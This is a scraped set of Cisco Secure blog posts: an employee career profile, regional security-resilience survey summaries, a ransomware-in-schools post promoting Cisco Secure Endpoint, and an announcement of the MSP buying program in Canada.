“Our amazing team knew that for it to catch on internally we needed to help people understand the why. The team put together an amazing training and went around the company to help people understand the security buyer, the industry overall and our differentiators and how we could do all of this within the umbrella of Cisco,” she said.

Recognizing that she most enjoys and feels best suited for a strategic operations role, she had open conversations with her manager. “I told my boss, ‘It’s just not a great fit.’” Her manager was very supportive, and they worked through potential options. “You’ll find a lot of that at Cisco,” she said.

Now as senior manager in the Strategy and Operations Group within Cisco’s Security and Collaboration division, Frankel runs key initiatives for business operations that drive business growth. She is empowered to creatively solve problems and collaborate “with all the stakeholders within each group to move these programs forward, to understand the problems we’re looking to solve, create objectives, a program plan, and continue to track metrics and progress towards those ultimate goals,” she said.

Growing as a Leader at Cisco

A self-described “over communicator,” Frankel believes that as a leader, “the more you communicate and the more transparent you are, the better.” Frankel loves leading people who are experts in their fields and letting them do what they do best.

On the brand team, for example, she trusted her team’s expertise in producing stories, videos and animations to demystify Cisco’s security products.

“All I needed to do was give them the objective and the goals and they were able to come up with the solutions,” Frankel said.

She fondly remembers the boss at one of her first jobs out of college. In that job Frankel wrote press releases and wanted her boss to fully approve the final versions before sending them to the media. Once her boss told her, “Stephanie, if you keep giving it back to me, I will keep finding things to change. I trust you to know when it is ready to go.” That confidence in her so early in her career “gave me so much confidence in myself,” she said.

Frankel emulates his approach to management by recognizing that each employee has different needs in their lives, in their careers, and in how they like to receive feedback. From that boss Frankel first learned that for every piece of negative feedback, you must give four pieces of positive feedback for “someone to actually hear it because that’s how you balance things out in your mind.”

Frankel believes feedback is crucial for growth. “I don’t see how you can improve or grow without it, no matter what level of your career you’re at. Feedback shouldn’t be taken as negative, as much as it is a way for you to improve,” she said.

One of the most helpful things Frankel learned in a Cisco class for managers was the importance of asking a person if they are in a good place to receive critical feedback. “You might not be in the mindset to accept the feedback and to do something constructive with it,” she said. ”If you’re having a bad day or struggling, you could say, ‘You know what, I’m not going to be able to take it today, but let’s talk tomorrow and I’ll be in a better place to receive it.’’’

The Power of Pivot on a Security Career Path

Frankel has spent the last year thriving in a role she never anticipated in an industry her college training in journalism didn’t fully prepare her for. The secret, she says, is keeping an open mind to new possibilities and a willingness to take on new challenges, even if you don’t feel 100% ready.

“A lot of it is getting real world experience and learning your way through it and knowing that there’s a lot of opportunities and a lot of people that are willing to teach you,” she said.

cisco

To pivot professionally Frankel advises not feeling pigeonholed just because you studied a particular topic or have been in a certain industry for a long time. Take what you can from where you started such as storytelling and communications skills in the case of journalism for Frankel. While trying something new may require taking a different level or type of job “sometimes it’s worth it because you have that opportunity to grow and you might find you’re happier somewhere else,” she said.

When discerning professional steps Frankel recommends having open and honest conversations with yourself and others such as mentors.

“Cisco has so many mentorship programs and so many people that are knowledgeable about a lot of things,” she said. ”Just because your current role isn’t a great fit doesn’t mean that there’s not another good fit within the corporation, or it doesn’t mean that you can’t create your own good fit.”

Get started on your career path

Did you know that Cisco offers cybersecurity trainings and certifications? Start developing your cybersecurity skills today! And if you’re ready to jump into an exciting new career in security, check out the open roles at Cisco Secure and Duo Security.


We’d love to hear what you think. Ask a Question, Comment Below, and Stay Connected with Cisco Secure on social!

Cisco Secure Social Channels

Instagram
Facebook
Twitter
LinkedIn

Security Resilience in APJC

By Cindy Valladares

As the world continues to face formidable challenges, one of the many things impacted is cybersecurity. While recent challenges have been varied, they have all contributed to great uncertainty. How can organizations stay strong and protect their environments amidst so much volatility?

Lately we’ve been talking a lot about security resilience, and how companies can embrace it to stay the course no matter what happens. By building a resilient security strategy, organizations can more effectively address unexpected disruptions and emerge stronger.

Through our Security Outcomes Study, Volume 2, we were able to benchmark how companies around the world are doing when it comes to cyber resilience. Recent blog posts have taken a look at security resilience in the EMEA and Americas regions, and this post assesses resilience in Asia Pacific, Japan and China (APJC).

While the Security Outcomes Study focuses on a dozen outcomes that contribute to overall security program success, for this analysis, we focused on four specific outcomes that are most critical for security resilience. These include: keeping up with the demands of the business, avoiding major cyber incidents, maintaining business continuity, and retaining talented personnel.

Security performance across the region

The following chart shows the proportion of organizations in each market within APJC that reported “excelling” in these four outcomes:

Market-level comparison of reported success levels for security resilience outcomes

There is a lot of movement in this chart, but if you take a closer look, you will see that many of the percentage differences between markets are quite small. For example, 44.9% of organizations in the Philippines reported that they are proficient at keeping up with the business, with Mainland China closely following at 44.4%.

The biggest difference we see between the top spot and the bottom spot is around retaining security talent—42.4% of organizations in Australia reported that they were successful in that area, while only 18.3% of organizations in Hong Kong reported the same.

Next, we looked at the mean resilience score for each market in the region:

Market-level comparison of mean security resilience score

When we look at this, we can see the differences between the top six and bottom seven markets a bit more clearly. However, as the previous chart also showed, the differences are very slight. (When we take into account the gray error bars, they become even more slight.)

There are many factors that could contribute to these small differences when it comes to security resilience. But the most important thing to be gleaned from this data is how each market can improve its respective resilience level.

Improving resilience in APJC

The Security Outcomes Study revealed the top five practices—what we refer to as “The Fab Five”—that make the most impact when it comes to enhancing security. The following chart outlines the Fab Five, and demonstrates how each market in the APJC region ranked its own strength across these practices.

Market-level comparison of reported success levels for Fab Five security practices

If we look at Thailand, for example, 69.1% of organizations say they are adept at accurate threat detection, while only 28% of organizations in Taiwan say the same. Like in the previous charts, there is a lot of movement between how various markets reported their performance against these practices. However, it’s interesting to note that Taiwan remained consistent.

So does implementing the Fab Five improve resilience across organizations in APJC? Looking at the chart below, it’s safe to say that, yes, implementing the Fab Five does improve resilience. Organizations in APJC that did not implement any of the Fab Five practices ranked in the bottom 30% for resilience, whereas those that reported strength in all five rose to the top 30%.

Effect of implementing five leading security practices on overall resilience score

Boost your organization’s cyber resilience

While building resilience can sometimes seem like an elusive concept, we hope this data provides some concrete benchmarks to strive for in today’s security programs.

For additional insight, check out our resilience web page and the full

Security Outcomes Study

 


We’d love to hear what you think. Ask a Question, Comment Below, and Stay Connected with Cisco Secure on social!

Cisco Secure Social Channels

Instagram
Facebook
Twitter
LinkedIn

 

Ransomware attacks can and will shut you down

By Truman Coburn

No, ransomware attacks are not random. From extortion to data breaches, ransomware is always evolving, and is becoming very lucrative with ransomware-as-a-service kit making it easier to target organizations. The days of just a single bad actor searching for vulnerabilities in your security stack are over.  Security Operations Centers (SOCs) and the security analyst community are dealing with a sophisticated global network of adversaries who can do irreversible damage. The conversation must shift from how we can prevent a breach to how do we prepare for the inevitable breach.

What happened

Recently I found out that the small private college I attended right out of high school closed their doors permanently, falling victim to a targeted ransomware attack. This institution not only provided an education but also contributed to the local economy in this rural town for over 150 years.

The cyberattack occurred during the pandemic when most educational institutions had suddenly shifted to remote learning. Adversaries knew that the shift to remote learning would expose the college’s lack of acceptable tools for monitoring and managing applications, frequently from unsecure locations.

Unfortunately, the hackers were able to halt all admission activities, locked the administrators out from accessing critical data pertaining to the upcoming school year and ultimately, forced the school to close their doors – even after they paid the hackers the ransom.

And this is not an isolated case – Comparitech published a story ‘Ransomware attacks on US schools and colleges cost $3.56bn in 2021’ and outlined how threat actors have evolved with their ransomware attacks on schools and colleges. This is particularly concerning as many of these institutions do not have the skillsets or resources to protect their students or organization from these attacks. Below you can review their findings from a study done between 2018 – 2022:

Map: Comparitech  Get the data  Created with Datawrapper

Key findings 

In 2021: 

  • 67 individual ransomware attacks on schools and colleges–a 19 percent decrease from 2020 (83) 
  • 954 separate schools and colleges were potentially affected–a 46 percent decrease from 2020 (1,753) 
  • 950,129 individual students could have been impacted–a 31 percent decrease from 2020 
  • Ransomware amounts varied from $100,000 to a whopping $40 million 
  • Downtime varied from minimal disruption (thanks to frequent data backups) to months upon months of recovery time 
  • On average, schools lose over four days to downtime and spend almost a month (30 days) recovering from the attack 
  • Hackers demanded up to $52.3 million across just six attacks and received payment in two out of 18 cases where the school/college disclosed whether or not it paid the ransom (however, they are more likely to disclose that they haven’t paid the ransom than if they have). In one case, hackers received $547,000 
  • The overall cost of these attacks is estimated at around $3.56 billion 

Protect yourself from Cyber criminals 

Just having a firewall alone will not stop all of the attacks, it’s just a matter of time before you experience a breach.  Once the breach happens, you need a security system that will quickly detect and remediate the threat .

Resiliency must be a critical outcome for any security solution and Cisco Secure Endpoint is built to stop hackers at the point of entry. Our cloud native solution allows your security operations team to quickly detect and respond to threats minutes after a breach occurs.

Securing vectors threat actors have to your network has to be the goal 

Small to medium size businesses, hospitals, and educational institutions internal network will rely on cyber insurance in-lieu of a fully staffed, skilled cyber-security team. In today’s climate of ever-increasing sophisticated cyber threats this won’t cut it. You will need an agent that quickly detects, responds, and has visibility across your different security solutions.

With Cisco Secure Endpoint Pro we are equipped to assist with the responsibility of monitoring your endpoints for cyberattacks.  With 24/7/365 monitoring capabilities, our SOC will quickly detect and remediate any threats that targets your organization. Secure endpoint pro provides flexibility and the option of letting our SOC team do the heavy lifting while you focus on your core business.

Tangible outcomes provided by Secure Endpoint and Secure Endpoint Pro:

  • Stop threats before you’re compromised
  • Remediate faster and more completely
  • Maximize your security operations – Focus on the most important threats and gain always on security with managed EDR

Limit the amount of time threat actors have to your network

An effective managed endpoint detection and response solution frees up time for your SOC team along with accelerating detection and response time.  Cisco Secure Endpoint can reduce incident response time by as much as 97%, which limits the damage threat actors can cause after you have been breached.

Cisco Security has launched a solution geared towards protecting your school’s network by blocking malicious threats before they enter the endpoint and compromising your data. The secure endpoint agent is deployed, sits on the school endpoint freeing up time from a stretched thin IT department.

Don’t know where to get started? Check out how our EDR solution got you covered below and how to contact us to learn more.

 

Sign up for a Secure Endpoint 30-day free trial

and test drive a demo account

 

Did You Know: Cisco has a grant and funding option available for schools?

Interested? Reach out to grantsquestions@cisco.com to learn about public funding options available in your state.

 


We’d love to hear what you think. Ask a Question, Comment Below, and Stay Connected with Cisco Secure on social!

Cisco Secure Social Channels

Instagram
Facebook
Twitter
LinkedIn

Simplified SaaS Security for MSPs – Cisco Secure is now open in Canada

By Anjana Kambhampati

Managed services are an essential and fast-growing part of the security market, growing 14% annually. This opportunity presents new challenges MSPs must juggle day to day, including onboarding vendors and driving customer acquisition, all while making sure to provide robust IT solutions for your diverse set of clients. Clients are demanding more security and capabilities for a hybrid workforce, which provides a great opportunity for MSPs like you to grow your business.

We love our MSP community and want to help you deliver great security solutions to your clients. After speaking with many of you to understand how Cisco can help unlock growth for your businesses today, we developed a simplified buying model that delivers faster time to value. Cisco Secure MSP was born.

Secure MSP center was launched in the US market in November 2021 and MSPs across America have been rapidly transacting their business on MSP Center. We are excited to announce we are expanding this direct buying experience to Canadian MSPs in local Canadian Dollars for faster time to value and better ROI for your business.

Here’s a refresher of Secure MSP Center – 

It is a lightning fast and direct buying experience of SaaS security- No invoicing. Straightforward market pricing. And easy click-to-accept agreements. Cisco Umbrella’s market-leading DNS security is currently available with more SaaS security products coming soon.

So, how does Cisco Secure MSP work? 

It’s a simple three-step process that takes just minutes, from signup to deployment.  

Step 1 – You can sign up here and login with your Cisco ID (or create one)  

Step 2 – Provide billing and credit card information and sign a click-to-accept agreement 

Step 3 – Get access to our world class Cisco Umbrella DNS security offer 

From here, you can onboard your clients and start providing the first line of defense through Umbrella DNS Security product instantly. Sign up to deployment takes minutes – not hours or days.  

From here, you can onboard your clients and start providing the first line of defense through Umbrella DNS Security product instantly. Sign up to deployment takes minutes – not hours or days.

There are no minimums or upfront fees. Your credit card will be charged on the first of the month and you’ll receive a detailed invoice. This is a simple, no hassle, and post-paid consumption-based model.

Other perks include a dedicated partner account manager alongside our sales engineer, who will help you not only with product deployments but also work with you to grow your business. We also have an MSP specialist team to answer your questions.

Partners currently using Secure MSP Center have had great things to say –

“Wow, this was a much easier process than I thought it would be”

“I’m glad Cisco created a program and process that was this simple”

“I thought this would be more complicated”

“That’s all there is to it?”

So, what are you waiting for? Come and take the first step in simplifying security offers for your clients. Sign up here: cisco.com/go/securemsp.


We’d love to hear what you think. Ask a Question, Comment Below, and Stay Connected with Cisco Secure on social!

Cisco Secure Social Channels

Instagram
Facebook
Twitter
LinkedIn

Security Resilience in the Americas

By Cindy Valladares

The past couple of years have brought security resilience to the forefront. How can organizations around the world build resilience when uncertainty is the new normal? How can we be better prepared for whatever is next on the threat horizon? When threats are unpredictable, resilient security strategies are crucial to endure change when we least expect it.

In a previous blog post, we assessed security resilience in Europe, Middle East, and Africa (EMEA). Now, we take a look at organizations in the Americas to find out how they fare across four security outcomes that are critical for building resilience, based on findings from Cisco’s latest Security Outcomes Study. These outcomes include:

  1. Keeping up with the demands of the business
  2. Avoiding major security incidents
  3. Maintaining business continuity
  4. Retaining talented personnel

Country-level security performance

Based on the following chart, clear differences emerge when we examine these outcomes at the country level. The chart shows the proportion of organizations in each country that are reportedly “excelling” in the four outcomes contributing to security resilience.

What we see is that 52.7% of organizations in Colombia, for example, say their security programs are excelling at keeping up with the business, while only 35.3% report that they are excelling at avoiding major incidents. You can follow each country’s path through the four outcomes to see how they view their respective performance in certain areas.

Country-level comparison of reported success levels for security resilience outcomes

What’s really at the crux of these differences in security resilience among countries? Is Colombia that much more resilient than Mexico? Do organizations in different countries have varying definitions of what resilience is, and how they perceive their success? Reasons behind these country-level differences can be attributed to a variety of things, including security maturity, cultural factors and other organizational parameters.

Find out how our customers in the Americas

are staying cyber resilient with Cisco

How to improve resilience

Knowing what we know about how organizations across the Americas view their resilience, how can they improve it? The Security Outcomes Study, Volume 2, sheds some light here. In the study, we uncovered five practices proven to boost overall success in security programs, dubbed as the Fab Five:

  1. A proactive tech refresh strategy
  2. Well-integrated tech
  3. Timely incident response
  4. Prompt disaster recovery
  5. Accurate threat detection

So, how did countries in the Americas rank their implementation of these Fab Five practices? If we look at Colombia, for example, 64% of organizations say their capabilities for accurate threat detection are strong, while only 48.1% of Canadian organizations say the same. There is a lot of movement around the top three countries: Colombia, Mexico and Brazil. The U.S. ranks fourth consistently across the board.

Country-level comparison of reported success levels for five leading security practices

You may be wondering if implementing these five security practices improved resilience across organizations in the Americas. Our study found that organizations in the Americas that do not implement any of these five practices rank in the bottom 25% for resilience, whereas those that reported strength in all five practices rose to the top 25%.

Effect of implementing five leading security practices on overall resilience score

Staying strong in the face of change

Resilience is a cornerstone of cybersecurity. The ability to quickly pivot while maintaining business continuity and robust defenses is increasingly important in today’s world. If you would like more insight on how to build a cyber resilient organization, please check out our resilience web page and the full Security Outcomes Study

Watch video: What is security resilience?


We’d love to hear what you think. Ask a Question, Comment Below, and Stay Connected with Cisco Secure on social!

Cisco Secure Social Channels

Instagram
Facebook
Twitter
LinkedIn

❌